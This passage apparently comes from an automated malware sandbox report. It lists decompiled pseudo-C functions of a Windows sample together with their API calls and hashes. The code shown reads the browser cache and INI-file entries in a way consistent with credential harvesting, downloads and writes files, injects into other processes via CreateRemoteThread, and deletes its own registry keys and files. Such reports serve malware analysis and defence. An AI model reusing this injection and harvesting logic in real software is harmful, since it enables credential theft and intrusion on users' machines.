        								_t61 = _t60 -  *(_t96 + 0x1c);
        								__eflags = _t61;
        								_t103 = _t61;
        								if(_t61 != 0) {
        									__eflags = _a8;
        									if(_a8 == 0) {
        										_a12 = E0040D547(0x2000, 0x1000);
        									}
        									__eflags = _a12 - _t103;
        									_t103 =  <  ? _a12 : _t103;
        									__eflags = _a8;
        									if(_a8 != 0) {
        										E0040C1FE(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
        										_t50 = _t96 + 0x1c;
        										 *_t50 =  *(_t96 + 0x1c) + _t103;
        										__eflags =  *_t50;
        									}
        								}
        								_t62 = _a16;
        								__eflags = _t62;
        								if(_t62 != 0) {
        									 *_t62 = _t103;
        								}
        								_v16 = 1;
        							}
        						}
        						goto L32;
        					}
        					LeaveCriticalSection(0x42400c);
        					_v5 = E0041C949( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
        					EnterCriticalSection(0x42400c);
        					__eflags = _v5;
        					if(_v5 == 0) {
        						L21:
        						_t37 =  &_v16;
        						 *_t37 = _v16 & 0x00000000;
        						__eflags =  *_t37;
        						SetLastError(0x2ee4);
        						goto L22;
        					}
        					_t105 =  *_a4;
        					_t71 = E0041C2C7( *_a4);
        					__eflags = _t71 - 0xffffffff;
        					if(_t71 == 0xffffffff) {
        						E0040C1C2(_v12);
        						goto L21;
        					}
        					_t96 = _t71 * 0x24 +  *0x423e7c;
        					_t101 = E0040E2F8( &_v24, _t105);
        					_t79 = E00415547( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
        					__eflags = _t79;
        					if(_t79 == 0) {
        						L19:
        						E0040C1C2(_t101);
        						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
        						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
        						goto L22;
        					}
        					_t84 = E0040C402(_v24, 0, _t101);
        					_a4 = _t84;
        					__eflags = _t84;
        					if(_t84 == 0) {
        						goto L19;
        					}
        					_v28 = 0x1000;
        					_t107 = E0040C192(0x1000);
        					__eflags = _t107;
        					if(_t107 == 0) {
        						L18:
        						E0040C1C2(_a4);
        						goto L19;
        					}
        					 *_t107 = 0x50;
        					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
        					__eflags = _t89;
        					if(_t89 != 0) {
        						_t91 =  *(_t107 + 8);
        						__eflags = _t91;
        						if(_t91 != 0) {
        							__eflags =  *_t91;
        							if( *_t91 != 0) {
        								E00411372(_t91, _v12, _v20);
        							}
        						}
        					}
        					E0040C1C2(_t107);
        					goto L18;
        				} else {
        					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
        					L32:
        					goto L33;
        				}
        			}

        APIs
        • EnterCriticalSection.KERNEL32(0042400C), ref: 0041CA73
        • LeaveCriticalSection.KERNEL32(0042400C), ref: 0041CAD6
        • EnterCriticalSection.KERNEL32(0042400C), ref: 0041CAF3
        • GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0041CB77
        • SetLastError.KERNEL32(00002EE4), ref: 0041CBCD
        • LeaveCriticalSection.KERNEL32(0042400C), ref: 0041CC36
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
        • String ID:
        • API String ID: 3653105453-0
        • Opcode ID: 9fa7a374c5673b1d61efaf47442f8caf39359636b16f2ff24bcfed5287600771
        • Instruction ID: 10912bd6cf649258f70c3458cdd4b632c3e118039f491c4c83e0e95cd0e8ea4f
        • Opcode Fuzzy Hash: 9fa7a374c5673b1d61efaf47442f8caf39359636b16f2ff24bcfed5287600771
        • Instruction Fuzzy Hash: E8515C71940209ABCF10DFA5DCC5BDE7BB4AF04324F14416AF814AB291D778DD91CBA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E00418B35(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
        				WCHAR* _v8;
        				WCHAR* _v12;
        				short* _v16;
        				WCHAR* _v20;
        				short _v32;
        				short _v48;
        				short _v68;
        				short _v88;
        				short _v112;
        				char _v144;
        				void* __edi;
        				void* __esi;
        				WCHAR* _t40;
        				long _t41;
        				void* _t48;
        				void* _t50;
        				void* _t52;
        				void* _t54;
        				void* _t56;
        				WCHAR* _t61;
        				WCHAR* _t64;
        				void* _t72;
        				void* _t76;
        				WCHAR* _t83;
        				WCHAR* _t84;
        				WCHAR* _t86;
        				intOrPtr _t96;
        				void* _t97;
        
        				_t81 = __edx;
        				_t40 = E0040C192(0x1fffe);
        				_t86 = _t40;
        				_v20 = _t86;
        				if(_t86 == 0) {
        					return _t40;
        				}
        				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
        				if(_t41 <= 0) {
        					L17:
        					return E0040C1C2(_t86);
        				}
        				_t3 = _t41 + 1; // 0x1
        				if(E0040D072(_t86, _t3) == 0) {
        					goto L17;
        				}
        				_t83 = E0040C192(0xc08);
        				_v12 = _t83;
        				if(_t83 == 0) {
        					goto L17;
        				} else {
        					_t5 =  &(_t83[0x2fd]); // 0x5fa
        					_v16 = _t5;
        					_v8 = _t86;
        					_t48 = 0x65;
        					E004128DB(_t48,  &_v112);
        					_t50 = 0x66;
        					E004128DB(_t50,  &_v48);
        					_t52 = 0x67;
        					E004128DB(_t52,  &_v32);
        					_t54 = 0x68;
        					E004128DB(_t54,  &_v88);
        					_t56 = 0x69;
        					E004128DB(_t56,  &_v68);
        					goto L6;
        					L15:
        					_t61 = E0040D0AE(_v8, 1);
        					_v8 = _t61;
        					if(_t61 != 0) {
        						_t83 = _v12;
        						L6:
        						if(StrStrIW(_v8,  &_v112) == 0) {
        							_t64 = StrStrIW(_v8,  &_v48);
        							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
        								_t84 =  &(_t83[0xff]);
        								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
        									_t26 =  &(_t84[0xff]); // 0x0
        									_t94 = _t26;
        									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E004189CA(_t81, _t94) > 0) {
        										_t95 =  &_v144;
        										_t72 = 0x56;
        										E004128DB(_t72,  &_v144);
        										_push(_v12);
        										_t30 =  &(_t84[0xff]); // 0x0
        										_push(_t84);
        										_t85 = _v16;
        										_t81 = 0x307;
        										_t76 = E0040CEB5(_t95, 0x307, _v16, _t95);
        										_t97 = _t97 + 0x10;
        										if(_t76 > 0) {
        											_t96 = _a8;
        											if(E0040C5B6(_t76, _t96, _t85) != 0) {
        												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
        											}
        										}
        									}
        								}
        							}
        						}
        						goto L15;
        					} else {
        						E0040C1C2(_v12);
        						_t86 = _v20;
        						goto L17;
        					}
        				}
        			}

        APIs
        • GetPrivateProfileStringW.KERNEL32 ref: 00418B6C
          • Part of subcall function 0040C192: HeapAlloc.KERNEL32(00000008,-00000004,0040D960,00000000,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040C1A3
        • StrStrIW.SHLWAPI(00000001,?), ref: 00418BF4
        • StrStrIW.SHLWAPI(00000001,?), ref: 00418C05
        • GetPrivateProfileStringW.KERNEL32 ref: 00418C21
        • GetPrivateProfileStringW.KERNEL32 ref: 00418C3F
        • GetPrivateProfileStringW.KERNEL32 ref: 00418C59
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: PrivateProfileString$AllocHeap
        • String ID:
        • API String ID: 2479592106-0
        • Opcode ID: 2be6d454cf41ed9218d9398b10132a6bb212b0cea355619e2c026ca7901fd617
        • Instruction ID: 44868b22d9add0dc9408d58104c6211f2d918ebc5b3945481f54aabb602fc3fe
        • Opcode Fuzzy Hash: 2be6d454cf41ed9218d9398b10132a6bb212b0cea355619e2c026ca7901fd617
        • Instruction Fuzzy Hash: 64419F3290011AFADF10ABA5CD41EEFBB79EF44744F10452AB904F7251EB389E458BA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E0040BB02(void* __ebx, void* __ecx, void* __eflags) {
        				char _v1168;
        				char _v1668;
        				char _v1680;
        				short _v1688;
        				char _v2192;
        				short _v2208;
        				char _v2720;
        				char _v2728;
        				char _v2992;
        				char _v3072;
        				void* __edi;
        				void* __esi;
        				void* _t34;
        				WCHAR* _t50;
        				WCHAR* _t51;
        				WCHAR* _t52;
        				void* _t65;
        
        				_t65 = __eflags;
        				_t46 = __ecx;
        				_t50 =  &_v1668;
        				E0041349C(__ecx, _t50, 1);
        				PathRemoveFileSpecW(_t50);
        				_t51 =  &_v2192;
        				E0041349C(_t46, _t51, 2);
        				PathRemoveFileSpecW(_t51);
        				 *0x4238a0 =  *0x4238a0 | 0x00000002;
        				_push(0);
        				E0040B048();
        				E0041AA8C(_t46, _t65);
        				E00411830( &_v1680, _t65);
        				E00411830(_t51, _t65);
        				_t52 =  &_v2720;
        				E0041349C(_t51, _t52, 3);
        				SHDeleteKeyW(0x80000001, _t52);
        				CharToOemW( &_v1688,  &_v2728);
        				CharToOemW( &_v2208,  &_v2992);
        				_t53 =  &_v3072;
        				_t34 = 7;
        				E004128A5(_t34,  &_v3072);
        				_push( &_v2992);
        				_push( &_v2728);
        				_push( &_v2992);
        				_push( &_v2728);
        				if(E0040CEF9( &_v3072, 0x474,  &_v1168, _t53) > 0) {
        					E0040DC82(__ebx, 0x474,  &_v1168);
        				}
        				if( *0x423d68 == 0xffffffff) {
        					ExitProcess(0);
        				}
        				return 1;
        			}

        APIs
          • Part of subcall function 0041349C: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423900,00000000,00000032,?,0001FE38,00000000), ref: 00413515
        • PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 0040BB27
        • PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 0040BB3A
          • Part of subcall function 0040B048: SetEvent.KERNEL32(0040BB4A,00000000), ref: 0040B04E
          • Part of subcall function 0040B048: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B061
          • Part of subcall function 0041AA8C: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000,?,00020F96), ref: 0041AAC9
          • Part of subcall function 0041AA8C: Sleep.KERNEL32(000001F4), ref: 0041AAD8
          • Part of subcall function 0041AA8C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0041AAEE
          • Part of subcall function 00411830: FindFirstFileW.KERNEL32(?,?,?,?,?,00020F96), ref: 00411861
          • Part of subcall function 00411830: FindNextFileW.KERNEL32(00000000,?), ref: 004118BC
          • Part of subcall function 00411830: FindClose.KERNEL32(00000000), ref: 004118C7
          • Part of subcall function 00411830: SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00020F96), ref: 004118D3
          • Part of subcall function 00411830: RemoveDirectoryW.KERNEL32(?), ref: 004118DA
        • SHDeleteKeyW.SHLWAPI(?,?,00000003,00000000), ref: 0040BB78
        • CharToOemW.USER32 ref: 0040BB94
        • CharToOemW.USER32 ref: 0040BBA3
        • ExitProcess.KERNEL32 ref: 0040BBF9
          • Part of subcall function 0040DC82: CharToOemW.USER32 ref: 0040DCB2
          • Part of subcall function 0040DC82: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 0040DD36
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
        • String ID:
        • API String ID: 1572960351-0
        • Opcode ID: e8b792806ecff0397917da2d5b05e3786dabf06989889367a4a844a6ee7f2b2c
        • Instruction ID: a2b387e6c3f2b2097603f1b6efffffb2ab2b9564046f8741a7beb415e4b781ed
        • Opcode Fuzzy Hash: e8b792806ecff0397917da2d5b05e3786dabf06989889367a4a844a6ee7f2b2c
        • Instruction Fuzzy Hash: 1C21C472908344ABD230EBA5DD0AFDB779CEB84315F00092BB548E7191DB78A605CBDA
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040E004(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
        				char _v5;
        				long _v12;
        				struct _OVERLAPPED* _v16;
        				void* _v20;
        				long _v24;
        				void* _t28;
        				long _t37;
        				void* _t41;
        
        				_v5 = 0;
        				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
        				if(_t41 == 0xffffffff) {
        					L15:
        					return _v5;
        				}
        				_t28 = E0040C192(0x1000);
        				_v20 = _t28;
        				if(_t28 == 0) {
        					L13:
        					CloseHandle(_t41);
        					if(_v5 == 0) {
        						E0041151D(_a8);
        					}
        					goto L15;
        				}
        				_v16 = 0;
        				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
        					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
        						break;
        					}
        					if(_v12 == 0) {
        						FlushFileBuffers(_t41);
        						_v5 = 1;
        						break;
        					}
        					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
        						break;
        					}
        					_t37 = _v12;
        					if(_t37 != _v24) {
        						break;
        					}
        					_v16 = _v16 + _t37;
        					if(_v16 <= _a12) {
        						continue;
        					}
        					break;
        				}
        				E0040C1C2(_v20);
        				goto L13;
        			}

        APIs
        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 0040E024
        • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040E052
        • InternetReadFile.WININET(00001000,?,00001000,?), ref: 0040E06E
        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040E089
        • FlushFileBuffers.KERNEL32(00000000), ref: 0040E0A9
        • CloseHandle.KERNEL32(00000000), ref: 0040E0BC
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
        • String ID:
        • API String ID: 3509176705-0
        • Opcode ID: 5de04a6b89d19367334631d59ad8a9c3532827fc7105cb5073cd915f8d6201e9
        • Instruction ID: a525eba66cb21ea5fe2c98013379fe17f1e39bc58b487200e5ba5f0e6f07f869
        • Opcode Fuzzy Hash: 5de04a6b89d19367334631d59ad8a9c3532827fc7105cb5073cd915f8d6201e9
        • Instruction Fuzzy Hash: 3421AF31900219BFDF11AFA1CD84AAF7B7AFB00301F10497AF511B22E1C3B98D659B29
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 92%
        			E004108F7(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
        				intOrPtr* _v8;
        				long _v12;
        				struct HWND__* _v16;
        				int _v20;
        				struct HWND__* _v24;
        				long _t24;
        				struct HWND__* _t33;
        				intOrPtr* _t44;
        
        				_push(_a8);
        				_t44 = __edx;
        				_v8 = __edx;
        				_v20 = __ecx;
        				_t33 = WindowFromPoint(_a4.x);
        				if(_t33 != 0) {
        					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
        						_t24 = _v12;
        						if(_t24 != 0xffffffff) {
        							if(_t44 != 0) {
        								 *_t44 = _t24;
        							}
        						} else {
        							_v16 = _t33;
        							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
        							_t33 = E004108F7(_v20, _v8, _a4, _a8);
        							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
        						}
        					} else {
        						_t33 = 0;
        					}
        				}
        				return _t33;
        			}

        APIs
        • WindowFromPoint.USER32(?,?,00000000,?,?,?,00000000), ref: 00410913
        • SendMessageTimeoutW.USER32 ref: 00410944
        • GetWindowLongW.USER32(00000000,000000F0), ref: 00410968
        • SetWindowLongW.USER32 ref: 00410979
        • GetWindowLongW.USER32(?,000000F0), ref: 00410996
        • SetWindowLongW.USER32 ref: 004109A4
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Window$Long$FromMessagePointSendTimeout
        • String ID:
        • API String ID: 2645164282-0
        • Opcode ID: a45180b40cf10b14eb405651210357b020888a67d79b083f215a2481802641ac
        • Instruction ID: 4ba56e105de5fb0f0cce4d1f5091a9db8441476da3f937a5079a897d9797faea
        • Opcode Fuzzy Hash: a45180b40cf10b14eb405651210357b020888a67d79b083f215a2481802641ac
        • Instruction Fuzzy Hash: CB21A871518316ABE7109F25CC40E6B7B98EB84730F20472AFDE4963F2D674D9848B95
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 92%
        			E004108F7(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
        				intOrPtr* _v8;
        				long _v12;
        				struct HWND__* _v16;
        				int _v20;
        				struct HWND__* _v24;
        				long _t24;
        				struct HWND__* _t33;
        				intOrPtr* _t44;
        
        				_push(_a8);
        				_t44 = __edx;
        				_v8 = __edx;
        				_v20 = __ecx;
        				_t33 = WindowFromPoint(_a4.x);
        				if(_t33 != 0) {
        					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
        						_t24 = _v12;
        						if(_t24 != 0xffffffff) {
        							if(_t44 != 0) {
        								 *_t44 = _t24;
        							}
        						} else {
        							_v16 = _t33;
        							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
        							_t33 = E004108F7(_v20, _v8, _a4, _a8);
        							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
        						}
        					} else {
        						_t33 = 0;
        					}
        				}
        				return _t33;
        			}











        APIs
        • WindowFromPoint.USER32(?,?,00000000,?,?,?,00000000), ref: 00410913
        • SendMessageTimeoutW.USER32 ref: 00410944
        • GetWindowLongW.USER32(00000000,000000F0), ref: 00410968
        • SetWindowLongW.USER32 ref: 00410979
        • GetWindowLongW.USER32(?,000000F0), ref: 00410996
        • SetWindowLongW.USER32 ref: 004109A4
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: Window$Long$FromMessagePointSendTimeout
        • String ID:
        • API String ID: 2645164282-0
        • Opcode ID: a45180b40cf10b14eb405651210357b020888a67d79b083f215a2481802641ac
        • Instruction ID: 4ba56e105de5fb0f0cce4d1f5091a9db8441476da3f937a5079a897d9797faea
        • Opcode Fuzzy Hash: a45180b40cf10b14eb405651210357b020888a67d79b083f215a2481802641ac
        • Instruction Fuzzy Hash: CB21A871518316ABE7109F25CC40E6B7B98EB84730F20472AFDE4963F2D674D9848B95
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 74%
        			E004113D7(signed int __eax, void* __ecx, void** __esi, long _a4) {
        				intOrPtr _v8;
        				long _v12;
        				void* _t19;
        				void* _t20;
        				long _t22;
        				void* _t23;
        
        				_t33 = __esi;
        				asm("sbb eax, eax");
        				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
        				__esi[2] = _t19;
        				if(_t19 == 0xffffffff) {
        					L11:
        					_t20 = 0;
        				} else {
        					__imp__GetFileSizeEx(_t19,  &_v12);
        					if(_t19 == 0 || _v8 != 0) {
        						L10:
        						CloseHandle(_t33[2]);
        						goto L11;
        					} else {
        						_t22 = _v12;
        						__esi[1] = _t22;
        						if(_t22 != 0) {
        							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
        							 *__esi = _t23;
        							if(_t23 == 0) {
        								goto L10;
        							} else {
        								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
        									VirtualFree( *_t33, 0, 0x8000);
        									goto L10;
        								} else {
        									goto L5;
        								}
        							}
        						} else {
        							 *__esi = 0;
        							L5:
        							_t20 = 1;
        						}
        					}
        				}
        				return _t20;
        			}









        APIs
        • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00413996,?,?,00000000), ref: 004113FC
        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00413996,?,?,00000000), ref: 0041140F
        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00413996,?,?,00000000), ref: 00411437
        • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00413996,?,?,00000000), ref: 0041144F
        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00413996,?,?,00000000), ref: 00411469
        • CloseHandle.KERNEL32(?,?,?,?,?,00413996,?,?,00000000), ref: 00411472
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
        • String ID:
        • API String ID: 1974014688-0
        • Opcode ID: 9bd8a21221b8eb69d62a3331e990ceae85258be0999293c370e88b842d9085f3
        • Instruction ID: 397498b1218c3a8f66a40828a3cc2d78444f2d193c240055eb01a7fcf2f43caa
        • Opcode Fuzzy Hash: 9bd8a21221b8eb69d62a3331e990ceae85258be0999293c370e88b842d9085f3
        • Instruction Fuzzy Hash: 87118275100600BFEB214F21DC49EAB7BB9EB55B10B10892DF696E61B0D775A981CB28
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 86%
        			E0041D6E5(void* __ecx, long _a4, intOrPtr _a8) {
        				char _v5;
        				void* __edi;
        				void* __esi;
        				void* _t10;
        				void* _t14;
        				void* _t23;
        				void* _t25;
        				void* _t26;
        
        				_t21 = __ecx;
        				_push(__ecx);
        				_v5 = 0;
        				_t23 = OpenProcess(0x47a, 0, _a4);
        				_t28 = _t23;
        				if(_t23 != 0) {
        					_push(_t25);
        					_t10 = E004131B6(_t21, _t23, _t25, _t28, _a8, 0);
        					_t26 = _t10;
        					if(_t26 != 0) {
        						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x4238b4 + E00413966, 0, 0, 0);
        						_a4 = _t14;
        						if(_t14 == 0) {
        							VirtualFreeEx(_t23, _t26, 0, 0x8000);
        						} else {
        							WaitForSingleObject(_t14, 0x2710);
        							CloseHandle(_a4);
        							_v5 = 1;
        						}
        					}
        					CloseHandle(_t23);
        				}
        				return _v5;
        			}











        APIs
        • OpenProcess.KERNEL32(0000047A,00000000,0001FEE6,00000000,0001FEE6,?,?,0041D8A7,?,?,00000000), ref: 0041D6F9
        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0083721A,00000000,00000000,00000000), ref: 0041D727
        • WaitForSingleObject.KERNEL32(00000000,00002710,?,0041D8A7,?,?,00000000), ref: 0041D73A
        • CloseHandle.KERNEL32(0001FEE6,?,0041D8A7,?,?,00000000), ref: 0041D743
        • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,0041D8A7,?,?,00000000), ref: 0041D757
        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,0041D8A7,?,?,00000000), ref: 0041D75E
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
        • String ID:
        • API String ID: 14861764-0
        • Opcode ID: cd2152dd7656f8048059b3ee3b471b59a9a02bd3c3688b58f383d56308ca243a
        • Instruction ID: 913c21e63c97e327a6d5f25f35db06ed154b0a7f2cb93bcf8f18adfe9c89d4b6
        • Opcode Fuzzy Hash: cd2152dd7656f8048059b3ee3b471b59a9a02bd3c3688b58f383d56308ca243a
        • Instruction Fuzzy Hash: 5C01B1B2508248BFE7112F64DDCCEFF3E6CDB497A5B044069F601A6160C6794D868679
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 92%
        			E0040AA81(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
        				void* _t21;
        				int _t22;
        				signed int _t23;
        				struct HWND__* _t27;
        				char* _t31;
        
        				_t27 = _a4;
        				if(( *0x4238a0 & 0x00000004) == 0 || E004132A1() == 0) {
        					L7:
        					return GetUpdateRgn(_t27, _a8, _a12);
        				} else {
        					_t31 = TlsGetValue( *0x423e84);
        					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
        						goto L7;
        					} else {
        						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
        						if(_a12 != 0) {
        							_t22 = SaveDC( *(_t31 + 8));
        							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
        							asm("sbb eax, eax");
        							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
        							RestoreDC( *(_t31 + 8), _t22);
        						}
        						 *_t31 = 1;
        						_t21 = 2;
        						return _t21;
        					}
        				}
        			}








        APIs
        • GetUpdateRgn.USER32 ref: 0040AB09
          • Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9
        • TlsGetValue.KERNEL32 ref: 0040AAA1
        • SetRectRgn.GDI32(?,?,?,?,?), ref: 0040AAC1
        • SaveDC.GDI32(?), ref: 0040AAD1
        • SendMessageW.USER32(?,00000014,?,00000000), ref: 0040AAE1
        • RestoreDC.GDI32(?,00000000), ref: 0040AAF3
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
        • String ID:
        • API String ID: 3142230470-0
        • Opcode ID: d77714f24e56bfa60ba8508e97fde677f7d74fdf6fa772479a1b81748a329343
        • Instruction ID: e34874618b23d694526dd9b039755d9cd8fc9c3635f83db03c8ebf5feab68804
        • Opcode Fuzzy Hash: d77714f24e56bfa60ba8508e97fde677f7d74fdf6fa772479a1b81748a329343
        • Instruction Fuzzy Hash: D0117031100741EFCB329F60DD49E97BBB6FB04711F004929FA86A25B1C775A864DB59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 99%
        			E00414B25(void* __edx, intOrPtr _a4) {
        				signed int _v12;
        				int _v16;
        				void* _v20;
        				int _v24;
        				signed int _v28;
        				int _v32;
        				char _v36;
        				signed int _v40;
        				signed int _v44;
        				signed int _v48;
        				signed int _v52;
        				intOrPtr _v56;
        				signed int _v60;
        				signed int _v64;
        				intOrPtr _v74;
        				intOrPtr _v78;
        				char _v80;
        				struct _SYSTEMTIME _v96;
        				char _v112;
        				short _v184;
        				short _v288;
        				void* __ebx;
        				void* __esi;
        				signed int _t127;
        				signed int _t131;
        				signed int _t132;
        				signed int _t133;
        				signed int _t134;
        				signed int _t140;
        				signed int _t142;
        				signed int _t143;
        				signed int _t151;
        				signed int _t155;
        				signed int _t159;
        				signed char _t163;
        				signed int _t167;
        				signed int _t176;
        				signed int _t177;
        				signed int _t186;
        				long _t191;
        				long _t195;
        				signed int _t201;
        				void* _t202;
        				signed int _t203;
        				signed int _t208;
        				signed int _t211;
        				signed int _t212;
        				signed int _t219;
        				short* _t230;
        				signed int _t238;
        				intOrPtr _t239;
        				void* _t244;
        
        				_t239 = _a4;
        				_t126 =  *((intOrPtr*)(_t239 + 0x40));
        				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
        					_t127 = E00411D2E( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
        					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
        					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
        					_t238 = _t127;
        					_v64 = _t238;
        					__eflags = _t238;
        					if(_t238 == 0) {
        						L55:
        						E0040C1C2(_v64);
        						__eflags = 0 -  *(_t239 + 0x3c);
        						asm("sbb eax, eax");
        						return  ~0x00000000;
        					}
        					_t131 = _v12;
        					__eflags = _t131 - 0x10;
        					if(_t131 <= 0x10) {
        						goto L55;
        					}
        					__eflags =  *((char*)(_t239 + 0x18)) - 1;
        					_v16 = 1;
        					_t132 = _t131 + _t238;
        					__eflags = _t132;
        					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
